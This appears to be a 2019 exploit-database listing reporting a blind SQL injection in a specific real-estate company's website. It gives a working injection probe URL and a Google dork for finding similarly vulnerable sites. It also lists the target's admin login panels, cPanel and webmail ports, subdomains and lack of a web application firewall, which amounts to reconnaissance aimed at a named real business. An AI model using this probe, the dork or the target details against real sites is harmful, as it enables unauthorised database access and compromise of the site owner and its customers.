Cabrera Propiedades (Blind SQL Injection)

2019.09.15
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Exploit Title: Cabrera Propiedades (Blind SQL Injection) Discovered By: intrackeable Date: 14/09/2019 Tested On: Linux Kubuntu Google Dork: "inurl:php?id= site:ar intext:propiedades" Category: WebApps Vulnerability Type: CWE-89 Vendor Home Page: cabrerapropiedades.com.ar PoC: http://cabrerapropiedades.com.ar/ficha_emp.php?id=15%27 Admin Login Paths: http://www.cabrerapropiedades.com.ar/adm/ https://www.cabrerapropiedades.com.ar:2083/ https://www.cabrerapropiedades.com.ar:2096/ Subdomains: http://localhost.cabrerapropiedades.com.ar http://ftp.cabrerapropiedades.com.ar WAF Detection: No WAF detected by the generic detection.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top